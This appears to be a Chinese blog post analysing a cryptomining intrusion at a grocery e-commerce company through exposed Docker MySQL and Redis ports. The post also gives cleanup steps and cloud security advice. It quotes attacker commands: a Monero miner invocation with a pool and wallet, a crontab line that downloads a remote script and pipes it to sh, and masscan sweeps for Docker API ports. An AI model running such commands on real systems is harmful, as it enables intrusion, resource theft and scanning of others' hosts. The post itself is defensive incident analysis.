[[383510]]

0x00、前言

繼快遞、外賣之后，互聯網買菜也成為一種時尚。這背后是成長迅速的新零售生鮮行業，加之承載著非常高頻、重要的本地生活平臺入口功能，由此吸引著眾多互聯網巨頭。那么針對本次風口，大公司有自己完善的安全治理解決方案，一般不會有重大的安全事件發生。但是針對一些中小公司來說，上線業務快(使用公有云)、沒有完善的前期業務安全規劃，安全運營外包，設置核心業務和核心算法與大學合作外包。導致安全事件頻發，本文以一次某生鮮電商業務安全事件為切入點，討論一下快餐時代的安全運營之道。

0x01、藥引子

@1、泛互聯網業務介紹

用戶業務系統規模大約40+臺服務器，包含：核心業務系統：云鮮集智能電商生態系統，客戶關系管理系統;渠道端—營銷端—數據端全鏈數字化運營體系：各種App渠道數據、第三方聊天記錄數據導入系統，算法平臺，自助式BI數據報表，輔助系統：服務器運維監控、監理程序、安全服務等。

@2、安全問題發現階段

安全問題發現是從公有云平臺側發現的。在公有云外網出口Pop點IDS監控數據中發現該賬號下多臺主機出現對外DDoS攻擊，導致影響部署在同一物理機上其它云主機出現網絡數據丟包的現象，很不幸的是，這個被影響的用戶是游戲廠商，對網絡延時要求特別高，在網絡性能監控系統中發現，延時增大影響業務。

@3、安全問題排查階段

網絡層面發現的安全問題需要到主機層面有相關的驗證;主機層，需要安裝主機安全客戶端，否則無法感知到主機層的安全威脅，經后臺查詢發現該租戶大部分云主機是沒有安裝公有云提供的默認鏡像，導致沒有安裝云原生主機安全客戶端，聯系客戶運維，在所有服務器上安裝主機安全客戶端，同時購買企業版。

安裝完成后，主機安全入侵檢測系統立刻發現海量的安全告警，告警類型包括：

【1】挖礦檢測：

/tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k –tls 

【2】病毒木馬：

/tmp/watchdog 

【3】敏感文件篡改：

發現crontab下設置

0 0 */3 * * /bin/sh –c wget –q -0 –  
http://195.xxx.xxx.118/spr.sh|sh >/dev/null 2>&1 

【4】資產指紋

同時登陸主機安全運營界面，通過資產指紋功能查看發現：

運行了大量對外掃描的進程

masscan 126.0.0.0/8 -p2377 --rate=50000 
masscan 95.0.0.0/8 -p4243 --rate=50000 
masscan 225.0.0.0/8 -p4243 --rate=50000 
masscan 215.0.0.0/8 -p2376 --rate=50000 

同時發現大量容器接口對外監聽，業務系統搭建比較隨意，很多系統都是通過docker方式搭建，直接把docker端口映射到外網。其中包括redis、mysql等敏感服務。

【5】容器運行時安全

通過容器運行時安全產品功能發現：

@4、業務止損

發現問題的主機正好是前面提到的核心業務系統主機，出現問題后平臺，直接下線其網絡權限，導致生鮮業務訂單系統無法正常運行，已改成手工excel記賬的方式運轉。所以，先做一下業務止損。

整體入侵流程：

1、暴力破解容器自帶mysql和redis，

2、成功獲取到數據庫權限后寫入下載惡意程序執行腳本

3、執行下惡意程序腳本

4、容器中部署挖礦程序

5、啟動masscan掃描程序對外橫向攻擊

6、入侵宿主機部署挖礦程序和掃描程序。

整體止損流程：

•  清除crontab中加載的惡意腳本
• 殺掉進程
•  刪除可疑進程相關文件
• 把請求地址加入黑名單
•  提申請開放網絡權限

0x02、快餐時代的安全運營

根據與安全托管運營商溝通，發現這種泛互聯網企業其實是不愿意在安全方面投錢，運營代理提供的安全建議也基本上認為不重要，等安全事件發生影響到業務了才有所醒悟。

經過多年的安全經驗積累，建議云上租戶做好以下幾點：

1、充分利用公有云IaaS產品原生安全屬性

•  VPC，不同的業務單元需要隔離。
•  安全組，針對主機對外開放端口要嚴格限制。
•  NATGateway，內部主機要上網走NATGateway
•  云主機使用復雜密碼

2、適當的購買核心的云原生安全產品

•  主機安全企業版

主機安全，是服務器貼身安全管家，通過資產管理、漏洞管理、基線檢查、入侵檢測、程序運行認證、文件完整性校驗，安全運營、網頁防篡改等功能，幫助企業更方便地管理主機安全風險，實時發現黑客入侵行為，以及滿足等保合規要求。

費用：市面上價格一年1000元/臺, 40臺大約4萬塊。當然還有折扣。

•  云Web應用防火墻

云Web應用防火墻(云WAF)，云Web應用防火墻WAF對網站業務流量進行多維度檢測和防護,結合深度機器學習智能識別惡意請求特征和防御未知威脅,全面避免網站被黑客惡意攻擊和入侵。

費用：市面上價格一年4000元/10個域名, 4.8萬塊。當然還有折扣。

3、提高安全意識

如果是代理運營的話，給出的安全建議要足夠重視。

如若轉載，請注明原文地址。